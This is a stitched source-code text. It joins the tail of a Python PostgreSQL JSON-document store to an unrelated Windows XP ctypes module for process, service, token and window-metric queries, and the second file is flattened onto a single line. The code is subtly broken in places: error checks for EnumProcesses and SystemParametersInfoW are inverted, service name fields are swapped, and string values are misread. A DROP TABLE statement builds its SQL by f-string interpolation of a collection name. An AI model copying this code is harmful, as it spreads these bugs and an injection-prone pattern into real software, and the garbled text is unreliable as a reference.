            collection_id (str): Json document collection Id, i.e. DB table.
            keys (List[str]): Json Document Ids, i.e. DB row keys.

        Returns:
            int: Number of rows actually deleted (missing keys are skipped).
        """
        table = self._get_collection_table(project_id, collection_id)
        delete_statement = table.delete().where(table.c.key.in_(keys))
        with self._engine.begin() as conn:
            result = conn.execute(delete_statement)
            conn.commit()
        return result.rowcount

    def list_json_documents(
        self,
        project_id: str,
        collection_id: str,
        filter: Optional[str] = None,
        keys: Optional[List[str]] = None,
    ) -> List[JsonDocument]:
        """List all existing Json documents and optionally filter via Json Path syntax.

        The project is equivalent to the DB schema and the collection to a DB
        table inside the respective DB schema. Schema as well as table will be
        lazily created.

        Args:
            project_id (str): Project Id, i.e. DB schema.
            collection_id (str): Json document collection Id, i.e. DB table.
            filter (Optional[str], optional): Json Path filter. Defaults to None.
            keys (Optional[List[str]], optional): Json Document Ids, i.e. DB row keys. Defaults to None.

        Raises:
            ClientValueError: If filter is provided and does not contain a valid Json Path filter.

        Returns:
            List[JsonDocument]: List of Json documents.
        """
        table = self._get_collection_table(project_id, collection_id)
        sql_statement = table.select()
        if filter:
            # jsonb_path_exists evaluates the Json Path server-side against
            # the JSONB column.
            sql_statement = sql_statement.where(
                func.jsonb_path_exists(table.c.json_value, filter),
            )
        if keys:
            sql_statement = sql_statement.where(table.c.key.in_(keys))
        with self._engine.begin() as conn:
            try:
                result = conn.execute(sql_statement)
            except ProgrammingError:
                # Postgres rejects a malformed Json Path with a syntax error.
                raise ClientValueError("Please provide a valid Json Path filter.")
            rows = result.fetchall()
        return self._map_db_rows_to_document_models(rows)

    def delete_json_collections(
        self,
        project_id: str,
    ) -> None:
        """Deletes all JSON collections for a project.

        Drops the whole project schema (and thereby every collection table
        inside it).

        Args:
            project_id: Project ID associated with the collections.
        """
        # TODO: Check if further error handling is needed
        with self._engine.begin() as conn:
            stmt = text(
                f'DROP SCHEMA IF EXISTS "{self._get_schema_name(project_id)}" cascade'
            )
            conn.execute(stmt)
            conn.commit()

    def delete_json_collection(
        self,
        project_id: str,
        collection_id: str,
    ) -> None:
        """Delete a JSON collection.

        Args:
            project_id (str): Project ID associated with the collection.
            collection_id (str): The collection to be deleted.
        """
        stmt = text(
            f'DROP TABLE IF EXISTS "{self._get_schema_name(project_id)}"."{collection_id}" cascade'
        )
        with self._engine.begin() as conn:
            conn.execute(stmt)
            conn.commit()

    def _add_metadata_for_insert(self, data: dict) -> dict:
        """Return a copy of `data` with insert-time metadata columns stamped."""
        # TODO: Copy required?
        insert_data = data.copy()
        # TODO: Finalize
        insert_data["created_at"] = datetime.datetime.utcnow()
        # data["created_by"] =
        return insert_data

    def _add_metadata_for_update(self, data: dict) -> dict:
        """Return a copy of `data` with update-time metadata columns stamped."""
        update_data = data.copy()
        # TODO: Finalize
        update_data["updated_at"] = datetime.datetime.utcnow()
        # data["updated_by"] =
        return update_data

    def _map_db_rows_to_document_models(self, rows: List[Row]) -> List[JsonDocument]:
        """Convert a list of DB rows into JsonDocument models."""
        docs = []
        for row in rows:
            docs.append(self._map_db_row_to_document_model(row))
        return docs

    def _map_db_row_to_document_model(self, row: Row) -> JsonDocument:
        """Convert one DB row into a JsonDocument.

        The JSONB payload comes back from the driver as a dict and is
        re-serialized to a string because JsonDocument stores serialized JSON.
        """
        data: Dict = {}
        for column_name, value in row._mapping.items():
            if column_name == "json_value":
                value = json.dumps(value)
            data.update({column_name: value})
        return JsonDocument(**data)

    def _get_collection_table(self, project_id: str, collection_id: str) -> Table:
        """Return the Table for a collection, lazily creating schema and table."""
        # TODO: Decide on actual column datatypes
        collection = Table(
            collection_id,
            self._metadata,
            Column("key", postgresql.VARCHAR, primary_key=True),
            Column("json_value", postgresql.JSONB),
            Column("created_at", DateTime),
            Column("created_by", postgresql.VARCHAR),
            Column("updated_at", DateTime),
            Column("updated_by", postgresql.VARCHAR),
            schema=self._get_schema_name(project_id),
            keep_existing=True,  # TODO: Depends on how we handle schema modifications
        )
        try:
            collection.create(self._engine, checkfirst=True)
        except ProgrammingError:
            # Table creation fails when the schema does not exist yet;
            # create the schema, then retry once.
            create_schema(self._engine, self._get_schema_name(project_id))
            collection.create(self._engine, checkfirst=True)
        return collection
""" Windows XP functions """ from typing import Sequence, List, Tuple, Dict, Callable, Union, Optional from ctypes import c_wchar_p, c_int from ctypes import sizeof as c_sizeof from ctypes import cast as c_cast import atexit from .windows_common import ( byref, create_unicode_buffer, DWORD, UINT, LONG, CHAR, BOOL, BYTE, LPCWSTR, LPVOID, HMODULE, HANDLE, HWND, WPARAM, LPARAM, POINTER, Structure, WindowsErrorMessage, WinDLL, windll, MessageCallback, ) from .. import windows_constants from .supported_functions import ( Functions, ) from .process_metrics import ProcessMetrics from .window_metrics import WindowMetrics, FontMetrics def load_functions(environ: Dict[str, str], func_map: Functions) -> None: # TODO include Windows Server 2003 detection if environ['system'].lower() == 'windows' and environ['release'].lower() == 'xp': func_map.shell.find_notification_icons = create_shell__find_notification_icons(func_map) func_map.process.load_all_process_details = process__load_all_process_details load_psapi_functions(func_map) load_info_functions(func_map) load_taskbar_functions(func_map) load_window_functions(func_map) def load_psapi_functions(func_map: Functions) -> None: func_map.process.get_executable_filename = process__get_executable_filename func_map.process.get_all_service_information = process__get_all_service_information func_map.process.get_username_domain_for_pid = process__get_username_domain_for_pid func_map.process.get_current_username_domain = process__get_current_username_domain func_map.process.get_all_pids = process__get_all_pids def load_info_functions(func_map: Functions) -> None: func_map.shell.get_window_metrics = shell__get_window_metrics func_map.shell.set_window_metrics = shell__set_window_metrics func_map.shell.set_border_size = shell__set_border_size def load_taskbar_functions(func_map: Functions) -> None: func_map.shell.open_start_menu = shell__open_start_menu def load_window_functions(func_map: Functions) -> None: 
func_map.window.create_borderless_window = create_window__create_borderless_window(func_map) def create_shell__find_notification_icons(func_map: Functions) -> Optional[Callable[[], Sequence[HWND]]]: if not func_map.window.find_handle_for_child_class_title: return None find_window_ex = func_map.window.find_handle_for_child_class_title if not func_map.shell.get_task_bar_window_handles: return None shell__get_task_bar_window_handles = func_map.shell.get_task_bar_window_handles def fw(parent: Optional[HWND], class_name: str) -> Optional[HWND]: if not parent: return None return find_window_ex(parent, None, class_name, "") def f() -> Sequence[HWND]: ret: List[HWND] = [] for tbw_handle in shell__get_task_bar_window_handles(): parent_area = fw(fw(tbw_handle, "TrayNotifyWnd"), "SysPager") if not parent_area: continue for title in ['Notification Area', 'Overflow Notification Area']: handle = find_window_ex( parent_area, None, "ToolbarWindow32", title ) if handle is not None and handle.value is not None and handle not in ret: # TODO get icons ret.append(handle) return ret return f def process__get_executable_filename(thread_pid: DWORD) -> Union[str, WindowsErrorMessage, None]: psapi = WinDLL('psapi.dll') EnumProcesses = psapi.EnumProcesses EnumProcessModules = psapi.EnumProcessModules GetModuleBaseName = psapi.GetModuleBaseNameW # Alternate: GetModuleFileNameEx GetProcessImageFileName = psapi.GetProcessImageFileNameW hproc = windll.kernel32.OpenProcess( windows_constants.PROCESS_QUERY_INFORMATION | windows_constants.PROCESS_VM_READ, False, thread_pid ) if hproc != 0 and hproc is not None: try: filename = create_unicode_buffer(windows_constants.MAX_FILENAME_LENGTH + 1) res = GetProcessImageFileName(hproc, None, byref(filename), windows_constants.MAX_FILENAME_LENGTH + 1) if res > 0: print("DEBUG found filename ({1}) for pid {0}".format(thread_pid, filename)) return filename.value[:res] print("DEBUG failed to get filename for pid {0}: {1}".format(thread_pid, 
WindowsErrorMessage('GetProcessImageFileName'))) finally: windll.kernel32.CloseHandle(hproc) else: print("DEBUG failed to open the process handle for pid {0}".format(thread_pid)) # So, GetProcessImageFileName failed, as it's apt to do. # So, do this the hard way. process_list = (DWORD * windows_constants.MAX_PROCESS_COUNT)() bytes_returned = DWORD() res = EnumProcesses(process_list, c_sizeof(process_list), byref(bytes_returned)) if res != 0: return WindowsErrorMessage('psapi.EnumProcesses') # raise ctypes.WinError() for i in range(bytes_returned.value // c_sizeof(DWORD)): pid = process_list[i] if pid == thread_pid: hproc = windll.kernel32.OpenProcess( windows_constants.PROCESS_QUERY_INFORMATION | windows_constants.PROCESS_VM_READ, None, pid ) if hproc is None or 0 == hproc: continue try: buffer_index_count = 1024 count_allocated_space = DWORD() hmod_list = (HMODULE * buffer_index_count)() res = EnumProcessModules( hproc.value, hmod_list, DWORD(c_sizeof(hmod_list)), byref(count_allocated_space) ) if res == 0: # Error; ignore continue for j in range(count_allocated_space.value // c_sizeof(HMODULE)): mod_name = create_unicode_buffer(windows_constants.MAX_FILENAME_LENGTH + 1) res = GetModuleBaseName(hproc, hmod_list[j], mod_name, windows_constants.MAX_FILENAME_LENGTH + 1) if res != 0: return str(mod_name.value[:res]) finally: windll.kernel32.CloseHandle(hproc) return None def process__get_username_domain_for_pid(thread_pid: DWORD) -> Union[Tuple[str, str], WindowsErrorMessage]: """ :param thread_pid: :return: the tuple (username, domain) for the user that owns the pid. 
""" OpenProcessToken = windll.advapi32.OpenProcessToken OpenProcessToken.argtypes = [HANDLE, DWORD, POINTER(HANDLE)] OpenProcessToken.restype = BOOL GetTokenInformation = windll.advapi32.GetTokenInformation LookupAccountSidW = windll.advapi32.LookupAccountSidW LookupAccountSidW.argtypes = [ LPCWSTR, LPVOID, LPCWSTR, POINTER(DWORD), LPCWSTR, POINTER(DWORD), POINTER(DWORD) ] LookupAccountSidW.restype = BOOL # WinXP does not support PROCESS_QUERY_LIMITED_INFORMATION # This needs to have a special Windows 8 vs. other implementation. # Win 8 uses the more limited query. hproc = windll.kernel32.OpenProcess(windows_constants.PROCESS_QUERY_INFORMATION, False, thread_pid) if hproc == 0: err = WindowsErrorMessage('kernel32.OpenProcess') if err.errno == windows_constants.ERROR_ACCESS_DENIED: # Don't raise a problem in this situation. Instead, return unique information. return "[denied]", "[denied]" return err try: access_token = HANDLE() res = OpenProcessToken(hproc, DWORD(windows_constants.TOKEN_QUERY), byref(access_token)) if res == 0 or access_token is None: return WindowsErrorMessage('advapi32.OpenProcessToken') try: length = DWORD(0) res = GetTokenInformation( access_token, windows_constants.TOKEN_INFORMATION__TOKEN_USER, None, 0, byref(length) ) if res == 0: err = WindowsErrorMessage('advapi32.GetTokenInformation') if err.errno != windows_constants.ERROR_INSUFFICIENT_BUFFER: return err raw_sid_info = (BYTE * length.value)() if raw_sid_info is None: return WindowsErrorMessage('memory allocation failed') sid_info = c_cast(raw_sid_info, POINTER(LPVOID)) else: sid_info = POINTER(LPVOID)() res = GetTokenInformation( access_token, windows_constants.TOKEN_INFORMATION__TOKEN_USER, sid_info, length, byref(length) ) if res == 0: return WindowsErrorMessage('advapi32.GetTokenInformation') # The "sid_info" is a pointer to a structure, but the only thing we care about # is the first value in the structure (index 0), which is itself a pointer to a SID structure. 
sid_ptr = sid_info[0] username = create_unicode_buffer(windows_constants.MAX_USERNAME_LENGTH + 1) username_size = DWORD(windows_constants.MAX_USERNAME_LENGTH) domain = create_unicode_buffer(windows_constants.MAX_USERNAME_LENGTH + 1) domain_size = DWORD(windows_constants.MAX_USERNAME_LENGTH) sid_name_type = DWORD() res = LookupAccountSidW( None, sid_ptr, username, byref(username_size), domain, byref(domain_size), byref(sid_name_type)) if res == 0: return WindowsErrorMessage('advapi32.LookupAccountSidW') # return username.value[0:username_size], domain.value[0:domain_size] return username.value, domain.value finally: windll.kernel32.CloseHandle(access_token) finally: windll.kernel32.CloseHandle(hproc) def process__get_current_username_domain() -> Union[Tuple[str, str], WindowsErrorMessage]: # Just the username is easy (GetUserName), but the domain takes more work. return process__get_username_domain_for_pid(windll.kernel32.GetCurrentProcessId()) def process__load_all_process_details() -> Sequence[Dict[str, str]]: raise OSError("Undefined") # https://msdn.microsoft.com/en-us/library/windows/desktop/ms682648(v=vs.85).aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/ms685992(v=vs.85).aspx class ENUM_SERVICE_STATUS_PROCESS(Structure): _fields_ = ( ("lpServiceName", c_wchar_p), # string pointer ("lpDisplayName", c_wchar_p), # string pointer # ServiceStatusProcess ("dwServiceType", DWORD), ("dwCurrentState", DWORD), ("dwControlsAccepted", DWORD), ("dwWin32ExitCode", DWORD), ("dwServiceSpecificExitCode", DWORD), ("dwCheckPoint", DWORD), ("dwWaitHint", DWORD), ("dwProcessId", DWORD), ("dwServiceFlags", DWORD), ) _SERVICE_TYPES: Dict[int, str] = { 1: 'SERVICE_KERNEL_DRIVER', 2: 'SERVICE_FILE_SYSTEM_DRIVER', 0x10: 'SERVICE_WIN32_OWN_PROCESS', 0x20: 'SERVICE_WIN32_SHARE_PROCESS', } _SERVICE_CURRENT_STATES: Dict[int, str] = { 0x5: 'SERVICE_CONTINUE_PENDING', 0x6: 'SERVICE_PAUSE_PENDING', 0x7: 'SERVICE_PAUSED', 0x4: 'SERVICE_RUNNING', 0x2: 'SERVICE_START_PENDING', 
0x3: 'SERVICE_STOP_PENDING', 0x1: 'SERVICE_STOPPED', } def process__get_all_service_information() -> Union[WindowsErrorMessage, Sequence[ProcessMetrics]]: advapi32 = WinDLL('advapi32.dll') OpenSCManager = advapi32.OpenSCManagerW OpenSCManager.restype = DWORD EnumServicesStatusEx = advapi32.EnumServicesStatusExW # EnumServicesStatusExW(SC_HANDLE,SC_ENUM_TYPE,DWORD,DWORD,LPBYTE,DWORD,LPDWORD,LPDWORD,LPDWORD,LPCWSTR); # EnumServicesStatusEx.argtypes = [ # c_int, # hSCManager (SC_HANDLE) # c_int, # InfoLevel (SC_ENUM_TYPE) # wintypes.DWORD, # dwServiceType # wintypes.DWORD, # dwServiceState # wintypes.LPBYTE, # lpServices # wintypes.DWORD, # cbBufSize # wintypes.LPDWORD, # pcbBytesNeeded # wintypes.LPDWORD, # lpServicesReturned # wintypes.LPDWORD, # lpResumeHandle # wintypes.LPCWSTR # pszGroupname # ] CloseServiceHandle = advapi32.CloseServiceHandle CloseServiceHandle.argtypes = [HANDLE] sc = OpenSCManager(None, None, windows_constants.SC_MANAGER_ENUMERATE_SERVICE) if sc == 0: return WindowsErrorMessage('advapi32.OpenSCManagerW') try: bytes_needed = DWORD(0) service_byte_count = DWORD(0) service_count = DWORD(0) resume_handle = DWORD(0) status_array = None # Start off with 0 bytes allocated, and increase from there. while True: res = EnumServicesStatusEx( sc, windows_constants.SC_ENUM_PROCESS_INFO, # SERVICE_DRIVER | SERVICE_FILE_SYSTEM_DRIVER | SERVICE_KERNEL_DRIVER | SERVICE_WIN32, windows_constants.SERVICE_WIN32, windows_constants.SERVICE_STATE_ALL, status_array, service_byte_count, byref(bytes_needed), byref(service_count), byref(resume_handle), None ) if res != 0: break err = WindowsErrorMessage('advapi32.EnumServicesStatusExW') if err.errno != windows_constants.ERROR_MORE_DATA: # return err return () print("need {0} bytes".format(bytes_needed)) service_byte_count = bytes_needed count = bytes_needed.value // c_sizeof(ENUM_SERVICE_STATUS_PROCESS) status_array = (ENUM_SERVICE_STATUS_PROCESS * count)() if not status_array: # Nothing found on first pass. 
return () ret: List[ProcessMetrics] = [] for i in range(service_count.value): status = status_array[i] controls_accepted = [] if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_NETBINDCHANGE): controls_accepted.append('SERVICE_ACCEPT_NETBINDCHANGE') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_PARAMCHANGE): controls_accepted.append('SERVICE_ACCEPT_PARAMCHANGE') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_PAUSE_CONTINUE): controls_accepted.append('SERVICE_ACCEPT_PAUSE_CONTINUE') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_PRESHUTDOWN): controls_accepted.append('SERVICE_ACCEPT_PRESHUTDOWN') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_SHUTDOWN): controls_accepted.append('SERVICE_ACCEPT_SHUTDOWN') if _has_bit_set(status.dwControlsAccepted, windows_constants.SERVICE_ACCEPT_STOP): controls_accepted.append('SERVICE_ACCEPT_STOP') ret.append(ProcessMetrics( display_name=status.lpServiceName.value, service_name=status.lpDisplayName.value, service_type=( status.dwServiceType in _SERVICE_TYPES and _SERVICE_TYPES[status.dwServiceType] or None ), current_state=( status.dwCurrentState in _SERVICE_CURRENT_STATES and _SERVICE_CURRENT_STATES[status.dwCurrentState] or None ), controls_accepted=controls_accepted, exit_code=status.dwWin32ExitCode, service_exit_code=status.dwServiceSpecificExitCode, check_point=status.dwCheckPoint, wait_time_millis_hint=status.dwWaitHint, process_id=status.dwProcessId, flags=status.dwServiceFlags == 1 and ['SERVICE_RUNS_IN_SYSTEM_PROCESS'] or [], )) return ret finally: CloseServiceHandle(sc) def _has_bit_set(dw: DWORD, bit_mask: int) -> bool: return (dw.value & bit_mask) == bit_mask # https://msdn.microsoft.com/en-us/library/windows/desktop/dd145037(v=vs.85).aspx class LOGFONT(Structure): _fields_ = [ ("lfHeight", LONG), ("lfWidth", LONG), ("lfEscapement", LONG), ("lfOrientation", LONG), ("lfWeight", 
LONG), ("lfItalic", BYTE), ("lfUnderline", BYTE), ("lfStrikeOut", BYTE), ("lfCharSet", BYTE), ("lfOutPrecision", BYTE), ("lfClipPrecision", BYTE), ("lfQuality", BYTE), ("lfPitchAndFamily", BYTE), # Even though we use the W version of the call, we # still are expected to use CHAR, not WCHAR here. ("lfFaceName", CHAR * windows_constants.LF_FACESIZE), ] # https://msdn.microsoft.com/en-us/library/windows/desktop/ff729175(v=vs.85).aspx class NONCLIENTMETRICS(Structure): _fields_ = [ ("cbSize", UINT), ("iBorderWidth", c_int), ("iScrollWidth", c_int), ("iScrollHeight", c_int), ("iCaptionWidth", c_int), ("iCaptionHeight", c_int), ("lfCaptionFont", LOGFONT), ("iSmCaptionWidth", c_int), ("iSmCaptionHeight", c_int), ("lfSmCaptionFont", LOGFONT), ("iMenuWidth", c_int), ("iMenuHeight", c_int), ("lfMenuFont", LOGFONT), ("lfStatusFont", LOGFONT), ("lfMessageFont", LOGFONT), ] def shell__get_window_metrics() -> Union[WindowMetrics, WindowsErrorMessage]: metrics = shell__get_raw_window_metrics() if isinstance(metrics, WindowsErrorMessage): return metrics return WindowMetrics( border_width=metrics.iBorderWidth.value, scroll_width=0, scroll_height=metrics.iScrollHeight.value, caption_width=metrics.iCaptionWidth.value, caption_height=metrics.iCaptionHeight.value, caption_font=_font_to_dict(metrics.lfCaptionFont), sm_caption_width=metrics.iSmCaptionWidth.value, sm_caption_height=metrics.iSmCaptionHeight.value, sm_caption_font=_font_to_dict(metrics.lfSmCaptionFont), menu_width=metrics.iMenuWidth.value, menu_height=metrics.iMenuHeight.value, menu_font=_font_to_dict(metrics.lfMenuFont), status_font=_font_to_dict(metrics.lfStatusFont), message_font=_font_to_dict(metrics.lfMessageFont), # XP does not support this value. 
padded_border_width=0 ) def shell__get_raw_window_metrics() -> Union[NONCLIENTMETRICS, WindowsErrorMessage]: SystemParametersInfoW = windll.user32.SystemParametersInfoW metrics = NONCLIENTMETRICS() metrics.cbSize = c_sizeof(NONCLIENTMETRICS) res = SystemParametersInfoW(windows_constants.SPI_GETNONCLIENTMETRICS, metrics.cbSize, byref(metrics), 0) if res != 0: return WindowsErrorMessage('user32.SystemParametersInfoW') return metrics _BASE_OS_METRICS: List[Optional[NONCLIENTMETRICS]] = [None] def shell__set_window_metrics(metrics: WindowMetrics) -> Optional[WindowsErrorMessage]: return inner__set_window_metrics(metrics) def inner__set_window_metrics(metrics: Union[NONCLIENTMETRICS, WindowMetrics]) -> Optional[WindowsErrorMessage]: SystemParametersInfoW = windll.user32.SystemParametersInfoW # Always actions the original user metrics